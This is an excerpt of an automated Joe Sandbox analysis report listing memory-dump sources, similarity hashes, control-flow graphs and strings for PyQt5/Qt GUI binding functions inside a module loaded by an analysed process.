                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Err_$Clear$Data@@Iter_ListNext$?append@?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_V0@@Variant@@
                                                                                                                                                                                                                • String ID: index %zd has type '%s' but 'QInputMethodEvent::Attribute' is expected
                                                                                                                                                                                                                • API String ID: 4016545419-3488205848
                                                                                                                                                                                                                • Opcode ID: 811fa673cfc238aaa41eeda6768c5c35441724507aa68ce6c01ac4c5e1f28010
                                                                                                                                                                                                                • Instruction ID: e38b6894242cea28d7980d040e7e41a29da431e3dec8e7ce65dc93e433b78272
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 811fa673cfc238aaa41eeda6768c5c35441724507aa68ce6c01ac4c5e1f28010
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DA18CB2A08A4286EB74AF36E4502793769FF96F95F184075DE0E13794CF3CE4959700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 189 7ffb9a33beb0-7ffb9a33bf10 191 7ffb9a33bf12-7ffb9a33bf1a ?drawPoints@QPainter@@QEAAXAEBVQPolygonF@@@Z 189->191 192 7ffb9a33bf39-7ffb9a33bf84 189->192 193 7ffb9a33bf20-7ffb9a33bf38 191->193 195 7ffb9a33bf96-7ffb9a33bff6 192->195 196 7ffb9a33bf86-7ffb9a33bf94 ?drawPoints@QPainter@@QEAAXAEBVQPolygon@@@Z 192->196 198 7ffb9a33c021-7ffb9a33c081 195->198 199 7ffb9a33bff8-7ffb9a33c00d ?drawPoints@QPainter@@QEAAXPEBVQPointF@@H@Z 195->199 196->193 204 7ffb9a33c102-7ffb9a33c162 198->204 205 7ffb9a33c083-7ffb9a33c09d call 7ffb9a3630c0 198->205 199->193 200 7ffb9a33c013-7ffb9a33c01c call 7ffb9a3f9d54 199->200 200->193 209 7ffb9a33c18d-7ffb9a33c1e1 204->209 210 7ffb9a33c164-7ffb9a33c179 ?drawPoints@QPainter@@QEAAXPEBVQPoint@@H@Z 204->210 211 7ffb9a33c09f-7ffb9a33c0c2 PyTuple_Size ?drawPoints@QPainter@@QEAAXPEBVQPointF@@H@Z call 7ffb9a3f9d54 205->211 212 7ffb9a33c0c4 205->212 222 7ffb9a33c242-7ffb9a33c25b 209->222 223 7ffb9a33c1e3-7ffb9a33c1fd call 7ffb9a362f60 209->223 210->193 213 7ffb9a33c17f-7ffb9a33c188 call 7ffb9a3f9d54 210->213 215 7ffb9a33c0c9-7ffb9a33c0d1 211->215 212->215 213->193 219 7ffb9a33c0d3 _Py_Dealloc 215->219 220 7ffb9a33c0d9-7ffb9a33c0f7 215->220 219->220 226 7ffb9a33c0fd 220->226 227 7ffb9a33c268-7ffb9a33c271 220->227 222->227 229 7ffb9a33c1ff-7ffb9a33c222 PyTuple_Size ?drawPoints@QPainter@@QEAAXPEBVQPoint@@H@Z call 7ffb9a3f9d54 223->229 230 7ffb9a33c224 223->230 226->193 232 7ffb9a33c229-7ffb9a33c231 229->232 230->232 234 7ffb9a33c233 _Py_Dealloc 232->234 235 7ffb9a33c239-7ffb9a33c23b 232->235 234->235 235->227 236 7ffb9a33c23d 235->236 236->222
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?drawPainter@@Points@Tuple_$Size$Point@@$DeallocPoint$F@@@ItemPolygonPolygon@@@
                                                                                                                                                                                                                • String ID: BJ0W$BJ8W$BJ9$QPainter$drawPoints$drawPoints(self, points: QPolygonF)drawPoints(self, points: QPolygon)drawPoints(self, points: Optional[PyQt5.sip.array[Union[QPointF, QPoint]]])drawPoints(self, point: Optional[Union[QPointF, QPoint]], *args: Union[QPointF, QPoint])drawPoints(self, points:
                                                                                                                                                                                                                • API String ID: 2352560762-2263801330
                                                                                                                                                                                                                • Opcode ID: 07e88b2f091a9ea49d213234de3db452ac8d20a710bd02d5bca34276e61ffb26
                                                                                                                                                                                                                • Instruction ID: 6630f131d65a28a3e54e84b1ae337a4e22672ec299ecc9140e640fec4dc5621b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e88b2f091a9ea49d213234de3db452ac8d20a710bd02d5bca34276e61ffb26
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCC14CB6A19B5689EB60CF71E8800AD77B8FB48B88B505176EE4E43B68DF3CD044C740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • the first element has type '%s' but 'QOpenGLTexture.Filter' is expected, xrefs: 00007FFB9A30FD73
                                                                                                                                                                                                                • the second element has type '%s' but 'QOpenGLTexture.Filter' is expected, xrefs: 00007FFB9A30FDD0
                                                                                                                                                                                                                • sequence has %zd elements but 2 elements are expected, xrefs: 00007FFB9A30FCEF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_Sequence_$FormatItemOccurred$CheckFlagsSizeType_
                                                                                                                                                                                                                • String ID: sequence has %zd elements but 2 elements are expected$the first element has type '%s' but 'QOpenGLTexture.Filter' is expected$the second element has type '%s' but 'QOpenGLTexture.Filter' is expected
                                                                                                                                                                                                                • API String ID: 4278930742-3526451457
                                                                                                                                                                                                                • Opcode ID: 1070a1e1994d7eb63a28cfeef263ea19db83fcf846fcb55bb2bbfa17b81df9b0
                                                                                                                                                                                                                • Instruction ID: 0a5eb730610baee906304ef3939a6ab98111ee22d5a60eb5641c5f48713022ba
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1070a1e1994d7eb63a28cfeef263ea19db83fcf846fcb55bb2bbfa17b81df9b0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB514EA5A09B6282FB759B76E8541793368BF86FA4F1440B5CE0E637A0DF7CE485D300

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?insertCursor@@Image@$Format@@@ImageString@@@$??0?$Format@@FrameImage@@Point@@@@Position@String@@Vector@
                                                                                                                                                                                                                • String ID: BJ1$BJ9$BJ9E$BJ9|J1$QTextCursor$insertImage$insertImage(self, format: QTextImageFormat)insertImage(self, format: QTextImageFormat, alignment: QTextFrameFormat.Position)insertImage(self, name: Optional[str])insertImage(self, image: QImage, name: Optional[str] = '')
                                                                                                                                                                                                                • API String ID: 1837126645-292677817
                                                                                                                                                                                                                • Opcode ID: 5c1adad5432a419a0e87fc9a608ee3c8ecb9d2ff4636203f429608fe4ea8dc73
                                                                                                                                                                                                                • Instruction ID: 53a6404c24612451151f8503c56658b79d021ef4369f860c99067d66ea8100a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c1adad5432a419a0e87fc9a608ee3c8ecb9d2ff4636203f429608fe4ea8dc73
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1491F776609F46C9EB60CF25E8801A977B8FB49B88F514276EE8D43B28DF38E554C700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Size$List_$Tuple_$?setItemLongLong_Points@Polygon@@$DeallocErr_Occurred
                                                                                                                                                                                                                • String ID: BiiW$QPolygon$setPoints$setPoints(self, points: List[int])setPoints(self, firstx: int, firsty: int, *args: int)
                                                                                                                                                                                                                • API String ID: 1457764276-50150461
                                                                                                                                                                                                                • Opcode ID: 5bf819108298e5f4b65e7aa6009699c39a23a226b2e514b0e37f9f49d95420ee
                                                                                                                                                                                                                • Instruction ID: 1dd2d148f56fd266bbd4446156a82a65e5893e354777df4114f34d030c74071c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bf819108298e5f4b65e7aa6009699c39a23a226b2e514b0e37f9f49d95420ee
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54514072A19B5689EB60DF71E8406A837B8FB89B98F444176EE4E53764DF3CD049C700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 329 7ffb9a315f10-7ffb9a315f34 330 7ffb9a315f75-7ffb9a315f8b PySequence_Size 329->330 331 7ffb9a315f36-7ffb9a315f3e PySequence_Check 329->331 332 7ffb9a315f8d-7ffb9a315f9e 330->332 333 7ffb9a315f9f-7ffb9a315fd8 call 7ffb9a3f9d18 330->333 334 7ffb9a315f40-7ffb9a315f4e PyType_GetFlags 331->334 335 7ffb9a315f64-7ffb9a315f74 331->335 339 7ffb9a3161ac-7ffb9a3161bf 333->339 340 7ffb9a315fde-7ffb9a315fef 333->340 334->335 337 7ffb9a315f50-7ffb9a315f63 334->337 342 7ffb9a3161cc-7ffb9a3161f7 339->342 341 7ffb9a315ff0-7ffb9a316002 PySequence_GetItem 340->341 343 7ffb9a316236-7ffb9a31623d 341->343 344 7ffb9a316008-7ffb9a31602f PyErr_Occurred 341->344 345 7ffb9a31624f-7ffb9a316255 call 7ffb9a368880 343->345 346 7ffb9a31623f-7ffb9a316242 343->346 351 7ffb9a316035-7ffb9a31603d 344->351 352 7ffb9a3161f8-7ffb9a31622b PyErr_Format 344->352 349 7ffb9a31625a-7ffb9a316274 call 7ffb9a3f9d54 345->349 348 7ffb9a316244-7ffb9a31624d 346->348 346->349 348->345 348->349 349->342 355 7ffb9a31616d-7ffb9a316185 ?append@QListData@@QEAAPEAPEAXXZ call 7ffb9a3f9d18 351->355 356 7ffb9a316043-7ffb9a316098 ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z 351->356 352->343 363 7ffb9a31622d-7ffb9a316230 _Py_Dealloc 352->363 370 7ffb9a316188-7ffb9a31618d 355->370 358 7ffb9a3160c6-7ffb9a3160f3 356->358 359 7ffb9a31609a 356->359 361 7ffb9a3160f5-7ffb9a316114 call 7ffb9a3f9d18 358->361 362 7ffb9a316116-7ffb9a31611b 358->362 364 7ffb9a3160a0-7ffb9a3160bf call 7ffb9a3f9d18 359->364 361->362 367 7ffb9a31611d-7ffb9a316120 362->367 368 7ffb9a31612f-7ffb9a316135 call 7ffb9a368880 362->368 363->343 379 7ffb9a3160c1 364->379 374 7ffb9a316122-7ffb9a31612d 367->374 375 7ffb9a31613a-7ffb9a31616b call 7ffb9a3f9d18 367->375 368->375 371 7ffb9a31618f-7ffb9a316192 _Py_Dealloc 370->371 372 7ffb9a316198-7ffb9a3161a6 370->372 371->372 372->339 372->341 374->368 374->375 375->370 379->358
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • element %zd has type '%s' but 'QFontDatabase.WritingSystem' is expected, xrefs: 00007FFB9A316210
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sequence_$?detach_grow@CheckData@1@Data@@Err_FlagsItemListOccurredSizeType_
                                                                                                                                                                                                                • String ID: element %zd has type '%s' but 'QFontDatabase.WritingSystem' is expected
                                                                                                                                                                                                                • API String ID: 3772155008-1695380754
                                                                                                                                                                                                                • Opcode ID: 1148263e027fde29fbc7795b4cbce87eadaa7c1c7006bc26e05b6af7d4fc637e
                                                                                                                                                                                                                • Instruction ID: 24ece0d4e9f4e8d24cea24df8c3943e820f5f7bcbecd2c2d382a28ca41079b30
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1148263e027fde29fbc7795b4cbce87eadaa7c1c7006bc26e05b6af7d4fc637e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CA19CB2A09B8286EB60CF25E44036D7BA8FB89B94F58813ADE8E57754CF3CD455C700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
